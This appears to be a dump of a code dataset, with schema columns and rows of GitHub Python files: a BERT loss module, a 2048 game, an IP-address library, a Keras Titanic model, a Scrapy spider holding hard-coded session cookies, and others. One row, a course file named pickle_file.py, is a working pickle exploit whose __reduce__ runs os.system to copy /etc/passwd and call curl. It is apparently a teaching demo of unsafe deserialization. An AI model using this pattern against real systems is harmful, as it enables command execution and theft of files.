blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 5
283
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
41
| license_type
stringclasses 2
values | repo_name
stringlengths 7
96
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 58
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 12.7k
662M
⌀ | star_events_count
int64 0
35.5k
| fork_events_count
int64 0
20.6k
| gha_license_id
stringclasses 11
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 43
values | src_encoding
stringclasses 9
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 7
5.88M
| extension
stringclasses 30
values | content
stringlengths 7
5.88M
| authors
sequencelengths 1
1
| author
stringlengths 0
73
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a4c826fcfe6311083197e85bce0f8017a9af10bf | 3d928362dcde314562c80f83b79552983d4b0b37 | /bert/train/loss_models.py | d6ed29c74db721693b5aae118950c38050d26f6a | [
"Unlicense"
] | permissive | nawshad/BERT-pytorch | 18a7c949b1a61055ff87399909b30cd978eb8218 | fe45c85846a7d5c5b2668879239f482384940366 | refs/heads/master | 2021-07-09T23:23:45.224286 | 2020-08-23T08:27:50 | 2020-08-23T08:27:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,538 | py | from bert.preprocess import PAD_INDEX
from torch import nn
class MLMNSPLossModel(nn.Module):
def __init__(self, model):
super(MLMNSPLossModel, self).__init__()
self.model = model
self.mlm_loss_function = nn.CrossEntropyLoss(ignore_index=PAD_INDEX)
self.nsp_loss_function = nn.CrossEntropyLoss()
def forward(self, inputs, targets):
outputs = self.model(inputs)
mlm_outputs, nsp_outputs = outputs
mlm_targets, is_nexts = targets
mlm_predictions, nsp_predictions = mlm_outputs.argmax(dim=2), nsp_outputs.argmax(dim=1)
predictions = (mlm_predictions, nsp_predictions)
batch_size, seq_len, vocabulary_size = mlm_outputs.size()
mlm_outputs_flat = mlm_outputs.view(batch_size * seq_len, vocabulary_size)
mlm_targets_flat = mlm_targets.view(batch_size * seq_len)
mlm_loss = self.mlm_loss_function(mlm_outputs_flat, mlm_targets_flat)
nsp_loss = self.nsp_loss_function(nsp_outputs, is_nexts)
loss = mlm_loss + nsp_loss
return predictions, loss.unsqueeze(dim=0)
class ClassificationLossModel(nn.Module):
def __init__(self, model):
super(ClassificationLossModel, self).__init__()
self.model = model
self.loss_function = nn.CrossEntropyLoss()
def forward(self, inputs, targets):
outputs = self.model(inputs)
predictions = outputs.argmax(dim=1)
loss = self.loss_function(outputs, targets)
return predictions, loss.unsqueeze(dim=0)
| [
"[email protected]"
] | |
cb983a155f9e7664086637e86eac8576ef2b6efb | 9b991a23f3d7df0de43132233b978b0ffb415c6e | /course3/pickle/pickle_file.py | a6de8139cd7c6ff2538d84242a034c69399b0ad7 | [] | no_license | mycguo/python-deepdive | cdc0fa6cf50728c58a8a8836f2f2800e7fdd7fb7 | 37b181470e80a94fa6db5b237fb7de521130905d | refs/heads/master | 2022-12-14T15:58:00.973247 | 2020-09-12T03:38:14 | 2020-09-12T03:38:14 | 289,349,755 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 333 | py | import os
import pickle
class Exploit():
def __reduce__(self):
return (os.system, ("cat /etc/passwd > exploit.txt && curl www.google.com >> exploit.txt",))
def serialize_exploit(fname):
with open(fname, 'wb') as f:
pickle.dump(Exploit(), f)
serialize_exploit('loadme')
pickle.load(open('loadme', 'rb'))
| [
"[email protected]"
] | |
e04c76ee7cd3d8b1f62e00662a715d5ab09713dc | 926a9065a4fc220d022c8d7edcc4c01d1a4587f8 | /products/migrations/0039_auto_20200613_1112.py | e831c7857073ca1067ff482093967e12c0069745 | [] | no_license | singham3/electrotrade | 6b1ac38fe68f34b1bc6bd074e10271f1a94f75d7 | 2d1c4f1d5a4672c31cca0d4478b77ae134bb43d5 | refs/heads/master | 2022-11-20T22:07:16.588433 | 2020-07-24T14:31:03 | 2020-07-24T14:31:03 | 268,452,091 | 0 | 1 | null | 2020-07-19T20:20:51 | 2020-06-01T07:19:04 | Python | UTF-8 | Python | false | false | 396 | py | # Generated by Django 3.0.3 on 2020-06-13 11:12
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('products', '0038_auto_20200613_1108'),
]
operations = [
migrations.AlterField(
model_name='orderid',
name='order_id',
field=models.IntegerField(default=54268140),
),
]
| [
"[email protected]"
] | |
d425f088b08116e205b3ffe26d9c77b5c1e4e38d | e04ce35fd36785c3695f3107de262f1db13bdc00 | /2048.py | aa81421376af01b7b62722748fa542018b1195d5 | [] | no_license | Timurbl/game_2048 | edd6b6082263f7cab9c9a1ba777b3730b87b0c5b | ef5cccc75766b524eed2260111e9b092e9366538 | refs/heads/master | 2020-03-26T06:55:34.730690 | 2018-08-13T20:05:58 | 2018-08-13T20:05:58 | 144,628,122 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,373 | py | from tkinter import *
from logic2048 import Game
N = 4
color = {'' : 'light gray',
2 : 'pink',
4 : 'red',
8 : 'orange',
16: 'yellow',
32: 'light blue',
64: 'blue',
128: 'light green',
256: 'green'}
def left(event):
game.left()
draw(game)
if game.game_over():
print('GAME OVER')
def right(event):
game.right()
draw(game)
if game.game_over():
print('GAME OVER')
def up(event):
game.up()
draw(game)
if game.game_over():
print('GAME OVER')
def down(event):
game.down()
draw(game)
if game.game_over():
print('GAME OVER')
def draw(game):
for i in range(N):
for j in range(N):
table[i][j]['text'] = game[i][j]
try:
table[i][j]['bg'] = color[game[i][j]]
except KeyError:
table[i][j]['bg'] = 'white'
root = Tk()
table = [[Label(root, height=2, width=4, font='Arial 24') for i in range(N)] for j in range(N)]
for i in range(N):
for j in range(N):
table[i][j].grid(row=i, column=j)
for i in range(N):
root.grid_rowconfigure(i, pad=10)
root.grid_columnconfigure(i, pad=10)
game = Game()
draw(game)
root.bind('<Left>', left)
root.bind('<Right>', right)
root.bind('<Up>', up)
root.bind('<Down>', down)
root.mainloop() | [
"[email protected]"
] | |
ff48c9f51db42b5415104dcad82dcc5e7180f1a0 | a097ecf40fee329cfa9e3f77e4b6e9e29a8f148a | /5_section/5_c4.py | ad4129556566f3c699ab43db88f59f5c50ed0ab1 | [] | no_license | FumihisaKobayashi/The_self_taught_python | 1e7008b17050db3e615c2f3aa68df2edc7f93192 | 329d376689029b75da73a6f98715cc7e83e8cc2c | refs/heads/master | 2021-01-06T16:04:13.382955 | 2020-07-28T14:39:24 | 2020-07-28T14:39:24 | 241,389,313 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 215 | py | fumi = {
"身長": "1.73m",
"好きな色": "緑",
"好きな人": "Hideki Matsui"
}
answer = input("身長,好きな色 or 好きな人")
if answer in fumi:
a = fumi[answer]
print(a)
#:注意 | [
"[email protected]"
] | |
dae66138f278fea5834382498b52becae34edd5a | 063934d4e0bf344a26d5679a22c1c9e5daa5b237 | /margrave-examples-internal/capirca-margrave/capirca-r242-MODIFIED/lib/nacaddr.py | fc06f176005b79e1c4e5f83d4af8c3da2abb3c74 | [
"Apache-2.0"
] | permissive | tnelson/Margrave | 329b480da58f903722c8f7c439f5f8c60b853f5d | d25e8ac432243d9ecacdbd55f996d283da3655c9 | refs/heads/master | 2020-05-17T18:43:56.187171 | 2014-07-10T03:24:06 | 2014-07-10T03:24:06 | 749,146 | 5 | 2 | null | null | null | null | UTF-8 | Python | false | false | 7,241 | py | #!/usr/bin/python
#
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A subclass of the ipaddr library that includes comments for ipaddr objects."""
__author__ = '[email protected] (Tony Watson)'
from third_party import ipaddr
def IP(ipaddress, comment='', token=''):
"""Take an ip string and return an object of the correct type.
Args:
ip_string: the ip address.
comment:: option comment field
token:: option token name where this address was extracted from
Returns:
ipaddr.IPv4 or ipaddr.IPv6 object or raises ValueError.
Raises:
ValueError: if the string passed isn't either a v4 or a v6 address.
Notes:
this is sort of a poor-mans factory method.
"""
a = ipaddr.IPNetwork(ipaddress)
if a.version == 4:
return IPv4(ipaddress, comment, token)
elif a.version == 6:
return IPv6(ipaddress, comment, token)
class IPv4(ipaddr.IPv4Network):
"""This subclass allows us to keep text comments related to each object."""
def __init__(self, ip_string, comment='', token=''):
ipaddr.IPv4Network.__init__(self, ip_string)
self.text = comment
self.token = token
self.parent_token = token
def AddComment(self, comment=''):
"""Append comment to self.text, comma seperated.
Don't add the comment if it's the same as self.text.
Args: comment
"""
if self.text:
if comment and comment not in self.text:
self.text += ', ' + comment
else:
self.text = comment
def supernet(self, prefixlen_diff=1):
"""Override ipaddr.IPv4 supernet so we can maintain comments.
See ipaddr.IPv4.Supernet for complete documentation.
"""
if self.prefixlen == 0:
return self
if self.prefixlen - prefixlen_diff < 0:
raise PrefixlenDiffInvalidError(
'current prefixlen is %d, cannot have a prefixlen_diff of %d' % (
self.prefixlen, prefixlen_diff))
ret_addr = IPv4(ipaddr.IPv4Network.supernet(self, prefixlen_diff),
comment=self.text, token=self.token)
return ret_addr
# Backwards compatibility name from v1.
Supernet = supernet
class IPv6(ipaddr.IPv6Network):
"""This subclass allows us to keep text comments related to each object."""
def __init__(self, ip_string, comment='', token=''):
ipaddr.IPv6Network.__init__(self, ip_string)
self.text = comment
self.token = token
self.parent_token = token
def supernet(self, prefixlen_diff=1):
"""Override ipaddr.IPv6Network supernet so we can maintain comments.
See ipaddr.IPv6Network.Supernet for complete documentation.
"""
if self.prefixlen == 0:
return self
if self.prefixlen - prefixlen_diff < 0:
raise PrefixlenDiffInvalidError(
'current prefixlen is %d, cannot have a prefixlen_diff of %d' % (
self.prefixlen, prefixlen_diff))
ret_addr = IPv6(ipaddr.IPv6Network.supernet(self, prefixlen_diff),
comment=self.text, token=self.token)
return ret_addr
# Backwards compatibility name from v1.
Supernet = supernet
def AddComment(self, comment=''):
"""Append comment to self.text, comma seperated.
Don't add the comment if it's the same as self.text.
Args: comment
"""
if self.text:
if comment and comment not in self.text:
self.text += ', ' + comment
else:
self.text = comment
def CollapseAddrListRecursive(addresses):
"""Recursively loops through the addresses, collapsing concurent netblocks.
Example:
ip1 = ipaddr.IPv4Network('1.1.0.0/24')
ip2 = ipaddr.IPv4Network('1.1.1.0/24')
ip3 = ipaddr.IPv4Network('1.1.2.0/24')
ip4 = ipaddr.IPv4Network('1.1.3.0/24')
ip5 = ipaddr.IPv4Network('1.1.4.0/24')
ip6 = ipaddr.IPv4Network('1.1.0.1/22')
CollapseAddrRecursive([ip1, ip2, ip3, ip4, ip5, ip6]) ->
[IPv4Network('1.1.0.0/22'), IPv4Network('1.1.4.0/24')]
Note, this shouldn't be called directly, but is called via
CollapseAddr([])
Args:
addresses: List of IPv4 or IPv6 objects
Returns:
List of IPv4 or IPv6 objects (depending on what we were passed)
"""
ret_array = []
optimized = False
for cur_addr in addresses:
if not ret_array:
ret_array.append(cur_addr)
continue
if ret_array[-1].Contains(cur_addr):
# save the comment from the subsumed address
ret_array[-1].AddComment(cur_addr.text)
optimized = True
elif cur_addr == ret_array[-1].Supernet().Subnet()[1]:
ret_array.append(ret_array.pop().Supernet())
# save the text from the subsumed address
ret_array[-1].AddComment(cur_addr.text)
optimized = True
else:
ret_array.append(cur_addr)
if optimized:
return CollapseAddrListRecursive(ret_array)
return ret_array
def CollapseAddrList(addresses):
"""Collapse an array of IP objects.
Example: CollapseAddr(
[IPv4('1.1.0.0/24'), IPv4('1.1.1.0/24')]) -> [IPv4('1.1.0.0/23')]
Note: this works just as well with IPv6 addresses too.
Args:
addresses: list of ipaddr.IPNetwork objects
Returns:
list of ipaddr.IPNetwork objects
"""
return CollapseAddrListRecursive(
sorted(addresses, key=ipaddr._BaseNet._get_networks_key))
def SortAddrList(addresses):
"""Return a sorted list of nacaddr objects."""
return sorted(addresses, key=ipaddr._BaseNet._get_networks_key)
def RemoveAddressFromList(superset, exclude):
"""Remove a single address from a list of addresses.
Args:
superset: a List of nacaddr IPv4 or IPv6 addresses
exclude: a single nacaddr IPv4 or IPv6 address
Returns:
a List of nacaddr IPv4 or IPv6 addresses
"""
ret_array = []
for addr in superset:
if exclude == addr or addr in exclude:
# this is a bug in ipaddr v1. IP('1.1.1.1').AddressExclude(IP('1.1.1.1'))
# raises an error. Not tested in v2 yet.
pass
elif exclude.version == addr.version and exclude in addr:
ret_array.extend([IP(x) for x in addr.AddressExclude(exclude)])
else:
ret_array.append(addr)
return ret_array
def AddressListExclude(superset, excludes):
"""Remove a list of addresses from another list of addresses.
Args:
superset: a List of nacaddr IPv4 or IPv6 addresses
excludes: a List nacaddr IPv4 or IPv6 addresses
Returns:
a List of nacaddr IPv4 or IPv6 addresses
"""
superset = CollapseAddrList(superset)
excludes = CollapseAddrList(excludes)
ret_array = []
for ex in excludes:
superset = RemoveAddressFromList(superset, ex)
return CollapseAddrList(superset)
ExcludeAddrs = AddressListExclude
class PrefixlenDiffInvalidError(ipaddr.NetmaskValueError):
"""Holdover from ipaddr v1."""
if __name__ == '__main__':
pass
| [
"[email protected]"
] | |
fa97ee9fd2838b1142288a25b7c3b07d01df9382 | 80f622252281e6288d24b101dda0d4ee3634faed | /Titanic/model/model.py | 92f1eea0ae9e1af59615e0f34f8ec795553013ab | [] | no_license | jalondono/HandsOn-MachineLearning | c7cd7ce967180b84dffc2953d9ad5894c2bfc46e | eb3a3f2d6e490a827aa8b50cfb6e606cb3e85c5d | refs/heads/master | 2023-01-03T01:10:32.836434 | 2020-10-29T15:47:27 | 2020-10-29T15:47:27 | 300,308,942 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,158 | py | import pandas as pd
import numpy as np
import tensorflow.keras as K
import mlflow.tensorflow
import sys
import logging
import zipfile
# mlflow server --backend-store-uri mlruns/ --default-artifact-root mlruns/ --host 0.0.0.0 --port 5000
def getting_data(zipfolder, filename, cols):
"""
Get the data from a zip file
:param path: direction to zip file
:return: train dataset
"""
with zipfile.ZipFile(zipfolder, 'r') as zip_ref:
zip_ref.extractall()
data = pd.read_csv(filename, usecols=cols)
print('data set shape: ', data.shape, '\n')
print(data.head())
return data
def process_args(argv):
"""
convert the data arguments into the needed format
:param argv: Parameters
:return: converted parameters
"""
data_path = sys.argv[1] if len(sys.argv) > 1 else '../data'
debug = sys.argv[2].lower() if len(sys.argv) > 1 else 'false'
model_type = sys.argv[3] if len(sys.argv) > 1 else [256, 128]
model_type = model_type[1:-1].split(',')
splited_network = [int(x) for x in model_type]
alpha = float(sys.argv[4]) if len(sys.argv) > 1 else 0.5
l1_ratio = float(sys.argv[5]) if len(sys.argv) > 2 else 0
return data_path, debug, splited_network, alpha, l1_ratio
def create_model(network):
model = K.models.Sequential()
model.add(K.layers.Dense(units=256, input_dim=6,
kernel_initializer='ones',
kernel_regularizer=K.regularizers.l1(l1_ratio),
))
for units in network[1:]:
model.add(K.layers.Dense(units=units,
kernel_initializer='ones',
kernel_regularizer=K.regularizers.l1(l1_ratio),
))
model.add(K.layers.Dense(units=1, activation='sigmoid'))
opt = K.optimizers.Adam(learning_rate=alpha)
model.compile(optimizer=opt, loss='binary_crossentropy',
metrics=['accuracy'], )
print(model.summary())
return model
def train_model(model, X_train, Y_train, batch_size=128,
epoch=80, val_split=0.1):
"""
Perform the training of the model
:param model: model previously compiled
:return: history
"""
history = model.fit(x=X_train,
y=Y_train,
batch_size=128,
epochs=80,
validation_split=0.1)
return history
if __name__ == '__main__':
logging.basicConfig(level=logging.WARN)
logger = logging.getLogger(__name__)
# mlflow
mlflow.tensorflow.autolog()
# Utils cols from data
train_cols = ['Survived', 'Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare']
test_cols = ['Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare']
X_cols = ['Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare']
Y_cols = ['Survived']
# Get value arguments
data_path, debug, network, alpha, l1_ratio = process_args(sys.argv)
# train Data
filename = 'train.csv'
data = getting_data(data_path, filename, train_cols)
data['Sex_b'] = pd.factorize(data.Sex)[0]
data = data.drop(['Sex'], axis=1)
data = data.rename(columns={"Sex_b": "Sex"})
# testing data
filename = 'test.csv'
test = getting_data(data_path, filename, test_cols)
test['Sex_b'] = pd.factorize(test.Sex)[0]
test = test.drop(['Sex'], axis=1)
test = test.rename(columns={"Sex_b": "Sex"})
# filling train na values with mean
column_means = data.mean()
data = data.fillna(column_means)
# filling test na values with mean
column_means = test.mean()
test = test.fillna(column_means)
input_data = np.array(data[X_cols])
label_date = np.array(data[Y_cols])
test_input_data = np.array(test[X_cols])
X_train = input_data
Y_train = label_date
# definition of the model
model = create_model(network)
# training model
history = train_model(model, X_train, Y_train)
# predicting
score = model.predict(test_input_data, batch_size=32, verbose=1)
print("Test score:", score[0])
print("Test accuracy:", score[1])
| [
"[email protected]"
] | |
96c8aab9ccb46dfa1211316172d290d9a600c701 | 6713b68c912af377c741b26fe31db0fe6f6194d4 | /1st Term/Data_Structure_and_Algorithms/Codes/Exercises/ses07/tests/q5.py | 5cb7344c66b6cf0467faf08698d3e66fc4443db3 | [] | no_license | Lanottez/IC_BA_2020 | 820e8d9c1dbb473ed28520450ec702f00c6684ed | 8abd40c6a5720e75337c20fa6ea89ce4588016af | refs/heads/master | 2023-08-25T05:52:08.259239 | 2021-11-03T07:27:11 | 2021-11-03T07:27:11 | 298,837,917 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 934 | py | test = {
'name': 'Numpy - Q5',
'points': 0,
'suites': [
{
'cases': [
{
'code': r"""
>>> # It looks like you didn't give anything the name
>>> # fb_vol. Maybe there's a typo, or maybe you
>>> # just need to run the cell above this test cell where you defined
>>> # fb_vol. (Click that cell and then click the "run
>>> # cell" button in the menu bar above.)
>>> 'fb_vol' in vars()
a7465ecc0421c9e0085a8a012fce1e93
# locked
""",
'hidden': False,
'locked': True
},
{
'code': r"""
>>> fb_vol//0.0001 == 161.0
a7465ecc0421c9e0085a8a012fce1e93
# locked
""",
'hidden': False,
'locked': True
}
],
'scored': False,
'setup': '',
'teardown': '',
'type': 'doctest'
}
]
}
| [
"[email protected]"
] | |
13f1896c22ae2a9880e175bd288981ebe1216ccf | 8d5ba6747531cbd43d63d32265fd608f9081c3b7 | /.venv/lib/python2.7/site-packages/indico/modules/events/logs/controllers.py | a436382fa8b13d29f35d97c1b401f0e523a58dd9 | [] | no_license | Collinsnyamao/indico | 0e433b78803afae5b1ac90483db1f3d90ce2fddb | 32adf8123e266eb81439b654abc993b98e0cd7f2 | refs/heads/master | 2020-03-18T04:55:40.386595 | 2018-06-02T13:45:47 | 2018-06-02T13:45:47 | 134,314,163 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,324 | py | # This file is part of Indico.
# Copyright (C) 2002 - 2018 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from indico.modules.events.logs.models.entries import EventLogEntry
from indico.modules.events.logs.views import WPEventLogs
from indico.modules.events.management.controllers import RHManageEventBase
class RHEventLogs(RHManageEventBase):
"""Shows the modification/action log for the event"""
def _process(self):
entries = self.event.log_entries.order_by(EventLogEntry.logged_dt.desc()).all()
realms = {e.realm for e in entries}
return WPEventLogs.render_template('logs.html', self.event, entries=entries, realms=realms)
| [
"[email protected]"
] | |
8a7ff0ad022e61991efae1db238130da5169b004 | 7259dbcc9e32502945d362caa43d4ad380cd04ea | /OIT_SpiderCode/OYT_zujuan_Param/OYT_Scrapy_Param/spiders/new_zujuan_English_middle_spiderparam.py | 27bc29f69ebc3bbe7b018e3cdfcf6fd90583eb7c | [
"MIT"
] | permissive | Doraying1230/Python-Study | daa143c133262f4305624d180b38205afe241163 | 8dccfa2108002d18251053147ccf36551d90c22b | refs/heads/master | 2020-03-29T13:46:13.061373 | 2018-07-26T15:19:32 | 2018-07-26T15:19:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,915 | py | #coding:utf-8
import scrapy
from ..common.BaseObject import BaseObject
from scrapy.spider import CrawlSpider
from scrapy.selector import Selector
from scrapy.http import Request,FormRequest
from scrapy.selector import Selector
from scrapy.http.cookies import CookieJar
from fake_useragent import UserAgent
import time
import re
import os
class ZuQuanLoadData(BaseObject,CrawlSpider):
name = 'zujuan_english_middle_param'
custom_settings = {
'DOWNLOAD_DELAY': 3, 'CONCURRENT_REQUESTS_PER_IP': 5,
'ITEM_PIPELINES': {'OIT_ScrapyData.pipelines.OitScrapydataPipeline': None, }
}
def __init__(self):
ua = UserAgent()
user_agent = ua.random
self.file_name='zujuan_english_middle_param'
self.cookieValue = {'xd': '75519cb9f2bf90d001c0560f5c40520062a60ada9cb38350078f83e04ee38a31a%3A2%3A%7Bi%3A0%3Bs%3A2%3A%22xd%22%3Bi%3A1%3Bi%3A2%3B%7D',
'isdialog': 'bad3c21672f08107d1d921526d191f58bd47d79e7dbb432bd32624a836b42e85a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22isdialog%22%3Bi%3A1%3Bs%3A4%3A%22show%22%3B%7D',
'_csrf': '34c90a094ad3b3ab53cb75751fcab02bf693c164a6f5dfa244a6aec61e2f187ca%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22YlTOGIyOfskw0gy-voJy0vbGw4VVswCs%22%3B%7D',
'device': '310bdaba05b30bb632f66fde9bf3e2b91ebc4d607c250c2e1a1d9e0dfb900f01a%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22device%22%3Bi%3A1%3BN%3B%7D',
'PHPSESSID': 'utuj4csehjg3q9inhnuhptugk6',
'_sync_login_identity': '771bfb9f524cb8005c68374bdf39c9f22c36d71cf21d91082b96e7bd7a21e9eea%3A2%3A%7Bi%3A0%3Bs%3A20%3A%22_sync_login_identity%22%3Bi%3A1%3Bs%3A50%3A%22%5B1285801%2C%22YwmDuM6ftsN7jeMH7VDdT4OI-SvOisii%22%2C86400%5D%22%3B%7D',
'chid': '14e5d5f939c71d411898b3ee4671b5e06472c56cd9cffb59cc071e18732212f1a%3A2%3A%7Bi%3A0%3Bs%3A4%3A%22chid%22%3Bi%3A1%3Bs%3A1%3A%224%22%3B%7D',
'_identity': '95b973f53ecb67fdb27fe40c5660df1bbdb9c168cac8d1999dc6d0772a9ea122a%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22_identity%22%3Bi%3A1%3Bs%3A50%3A%22%5B1285801%2C%22fa26ed63eeec36f3e1682f05b68cd887%22%2C86400%5D%22%3B%7D',
'Hm_lvt_6de0a5b2c05e49d1c850edca0c13051f': '1515666025',
'Hm_lpvt_6de0a5b2c05e49d1c850edca0c13051f': '1515666640'}
self.hearders = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Connection': 'keep - alive',
# 'Referer': 'http://www.zujuan.com/question /index?chid = 3 & xd = 1',
'User-Agent': user_agent#'Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36'
}
print(self.hearders)
self.domain = 'http://www.zujuan.com'
def start_requests(self):
start_url = 'http://www.zujuan.com/question/index?chid=4&xd=2'
return [Request(url=start_url,cookies=self.cookieValue,headers=self.hearders,callback=self.parse_version)]
def parse_version(self,response):
result = response.body.decode()
resu = Selector(text=result)
versionTexts = resu.xpath('//div[@class="type-items"][1]/div/div/div/a/text()').extract()
versionUrls = resu.xpath('//div[@class="type-items"][1]/div/div/div/a/@href').extract()
version = dict(zip(versionTexts, versionUrls))
print(version)#{'人教版': '/question?bookversion=11740&chid=3&xd=1', '青岛版六三制': '/question?bookversion=23087&chid=3&xd=1', '北师大版': '/question?bookversion=23313&chid=3&xd=1', '苏教版': '/question?bookversion=25571&chid=3&xd=1', '西师大版': '/question?bookversion=47500&chid=3&xd=1', '青岛版五四制': '/question?bookversion=70885&chid=3&xd=1', '浙教版': '/question?bookversion=106060&chid=3&xd=1'}
for text in version :
if ('牛津' in text):
manURL =self.domain+version[text]#http://www.zujuan.com/question?bookversion=25571&chid=3&xd=1
deliver_param = {'version':'牛津译林版'}
deliver_param['course'] = '英语'
return [Request(url=manURL, meta=deliver_param,cookies=self.cookieValue, headers=self.hearders,callback=self.parse_categories)]
elif('沪教' in text):
manURL = self.domain + version[text] # http://www.zujuan.com/question?bookversion=25571&chid=3&xd=1
deliver_param = {'version': '沪教版'}
deliver_param['course'] = '英语'
return [Request(url=manURL,meta=deliver_param, cookies=self.cookieValue, headers=self.hearders,
callback=self.parse_categories)]
else:
pass
def parse_categories(self,response):
print(123,response.meta)
result = response.body.decode()
resu = Selector(text=result)
categoriesTexts = resu.xpath('//div[@class="type-items"][2]/div/div/div/a/text()').extract()
categoriesUrls = resu.xpath('//div[@class="type-items"][2]/div/div/div/a/@href').extract()
#http://www.zujuan.com/question?categories=25576&bookversion=25571&nianji=25576&chid=3&xd=1
categories = dict(zip(categoriesTexts, categoriesUrls))
print(123,categories)
categories_list = []
# print(categories)# {'一年级上册': '/question?categories=25572&bookversion=25571&nianji=25572&chid=3&xd=1', '一年级下册': '/question?categories=25573&bookversion=25571&nianji=25573&chid=3&xd=1', '二年级上册': '/question?categories=25574&bookversion=25571&nianji=25574&chid=3&xd=1', '二年级下册': '/question?categories=25575&bookversion=25571&nianji=25575&chid=3&xd=1', '三年级上册': '/question?categories=25576&bookversion=25571&nianji=25576&chid=3&xd=1', '三年级下册': '/question?categories=25577&bookversion=25571&nianji=25577&chid=3&xd=1', '四年级上册': '/question?categories=25578&bookversion=25571&nianji=25578&chid=3&xd=1', '四年级下册': '/question?categories=25579&bookversion=25571&nianji=25579&chid=3&xd=1', '五年级上册': '/question?categories=25580&bookversion=25571&nianji=25580&chid=3&xd=1', '五年级下册': '/question?categories=25581&bookversion=25571&nianji=25581&chid=3&xd=1', '六年级上册': '/question?categories=25582&bookversion=25571&nianji=25582&chid=3&xd=1', '六年级下册': '/question?categories=25592&bookversion=25571&nianji=25592&chid=3&xd=1'}
for text in categories:
categories_list.append(text)
comment = 0
while comment < len(categories_list):
text = categories_list[comment]
nianjiContentUrl = self.domain + categories[text]
print(12,nianjiContentUrl)
nianjiContentUrl =self.domain+categories[text]
comment += 1
response.meta['nianji'] = text
yield Request(url=nianjiContentUrl,meta=response.meta,cookies=self.cookieValue, headers=self.hearders,callback=self.parse_categories_content)
def parse_categories_content(self,response):
print(123,response.meta)
result = response.body.decode()
resu = Selector(text=result)
sectionsText = resu.xpath('//div[@id="J_Tree"]/div/a/text()').extract()
sectionsUrl = resu.xpath('//div[@id="J_Tree"]/div/a/@href').extract()
sections = dict(zip(sectionsText,sectionsUrl))
print(sections)
self.make_file()
sections_Text = []
sections_number = []
for text in sections:
sections_Text.append(text)
categoriesNumber = sections[text]
print(type(categoriesNumber),categoriesNumber)
ret = re.findall(r'categories=(\d*)&',categoriesNumber)
sections_number.append(ret[0])
print(123, ret)
need_sections_dict = dict(zip(sections_Text, sections_number))
nianji = response.meta ['nianji']
response.meta[nianji] = need_sections_dict
need_sections_str = str(response.meta)
with open('d:\\xiti10001\\zujuan\\{0}\\{1}\\categories_english_{0}.txt'.format(time.strftime('%Y%m%d',time.localtime(time.time())),self.file_name),'a') as f:
f.write(need_sections_str)
f.write('\n')
# categoriesNumber_s = categoriesNumber.find('=')
# print(categoriesNumber_s)
# categoriesNumber_e = categoriesNumber.find('&')
# print(categoriesNumber_e)
# categoriesNumbers = categoriesNumber[categoriesNumber_s,categoriesNumber_e]
def make_file(self):
path = 'd:\\xiti10001\\zujuan\\{0}\\{1}'.format(time.strftime('%Y%m%d',time.localtime(time.time())),self.file_name)
isExists = os.path.exists(path)
if (isExists):
pass;
else:
os.makedirs(path)
| [
"[email protected]"
] | |
0ac4cdf0dc4d0068c5d28f7e139bf35bbae92bca | c1ed1b90f7e914aee1a17cd9b5bb83cf288f7e85 | /usersAccount/apps.py | 7e257ce953933d0d4ded1fea4b4a19236a69a80c | [] | no_license | tanaychaulinsec/User-authentication | 87e111f3731b57f9057554a58781d1a1705e351c | 6652e72a5b639174cb20ccdae1c49883bdcc8514 | refs/heads/master | 2022-12-12T10:41:25.172936 | 2020-08-25T15:39:00 | 2020-08-25T15:39:00 | 289,565,247 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 99 | py | from django.apps import AppConfig
class UsersaccountConfig(AppConfig):
name = 'usersAccount'
| [
"[email protected]"
] | |
